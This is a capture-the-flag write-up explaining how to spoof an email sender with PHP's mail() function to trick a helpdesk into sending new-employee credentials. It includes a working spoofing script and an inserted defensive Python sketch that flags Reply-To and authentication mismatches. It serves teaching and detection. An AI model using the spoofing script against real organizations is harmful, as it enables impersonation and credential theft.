Hello Some Guy,
We need to begin sending requests for the new employee to get access to our security appliances. I believe they already know that you are authorized to make a new account request. Would you mind sending the new employee’s email address to email@example.com so they can process the account request?
The new employee can be a little slow to respond.
2/26 8:42 am CST: Visiting somebigcorp.com is not part of the challenge
The goal of this challenge is clear. Send an email to firstname.lastname@example.org requesting the credentials for the new employee. Although … we need to be disguised as email@example.com in order to request the credentials. How?
*Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source.*
PHP's mail() function is a perfect fit for this technique. All we need is a PHP server and an email server (search online for how to set one up if you don't know how).
The most important parameters in this case are From and Reply-To, in the additional headers section. In From we put the email address we want to spoof, and in Reply-To we choose the address where we want the people we fooled to send their replies; in this case we want to fool firstname.lastname@example.org.
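Seen from the receiving side, the From/Reply-To trick described above leaves traces in the message headers that a mail filter or analyst can check. The following Python sketch is an added example, not part of the original write-up; the sample message, its addresses and hostnames are constructed, and the function names are hypothetical.

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed sample of a stored message (all addresses and hosts are made up).
SAMPLE = """\
Return-Path: <www-data@vps.sender.example>
Authentication-Results: mx.somebigcorp.example; spf=pass smtp.mailfrom=vps.sender.example; dmarc=fail header.from=somebigcorp.example
From: someguy@somebigcorp.example
Reply-To: collector@mailbox.example
To: helpdesk@somebigcorp.example
Subject: Requesting new employee credentials
X-Mailer: PHP/7.4.3

Hello. Can you send them to my email collector@mailbox.example. Thanks
"""

def domain(header_value):
    """Return the lower-cased domain of the address in a header, or ''."""
    addr = parseaddr(header_value or "")[1]
    return addr.rpartition("@")[2].lower()

def spoof_indicators(raw):
    """List the reasons a message looks like From/Reply-To spoofing."""
    msg = message_from_string(raw)
    from_dom = domain(msg["From"])
    findings = []
    # Replies would leave the domain the message claims to come from.
    reply_dom = domain(msg["Reply-To"])
    if reply_dom and reply_dom != from_dom:
        findings.append("reply-to-domain-mismatch")
    # Weak signal on its own: bulk senders legitimately differ here too.
    env_dom = domain(msg["Return-Path"])
    if env_dom and env_dom != from_dom:
        findings.append("envelope-sender-mismatch")
    # Authentication-Results is stamped by the receiving server (RFC 8601).
    for ar in msg.get_all("Authentication-Results", []):
        for clause in ar.lower().split(";"):
            method, _, rest = clause.strip().partition("=")
            parts = rest.split()
            if method in ("spf", "dkim", "dmarc") and parts:
                if parts[0] not in ("pass", "none"):
                    findings.append(f"{method}-{parts[0]}")
    return findings

if __name__ == "__main__":
    print(spoof_indicators(SAMPLE))
```

A DMARC policy of `reject` on the spoofed domain would stop such a message before it reaches the inbox; the header checks above are for mail that was delivered anyway.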
So to retrieve the flag all we need is:
- PHP Server
- Email Server
- An email where we can receive the credentials (let’s call it email@example.com)
- Call the PHP mail() function from the server.
- Put the email where we want to receive the info into the body of the mail()’s message
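Let’s create the file imnotspoofing.php with the following content:

```php
<?php
$to = 'firstname.lastname@example.org'; // recipient (addresses appear as redacted on this page)
$subject = 'Requesting new employee credentials';
$message = 'Hello. I am request the new employee credentials. Can you send them to my email firstname.lastname@example.org. Thanks';
$headers = array(
    'From: email@example.com',     // the address we are disguised as
    'Reply-To: email@example.com', // the mailbox where we receive the reply
    'X-Mailer: PHP/' . phpversion()
);
mail($to, $subject, $message, implode("\r\n", $headers)); // header lines are separated by CRLF
```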
Shortly after running this PHP snippet from our server, we’ll receive an email at our email@example.com address with the flag: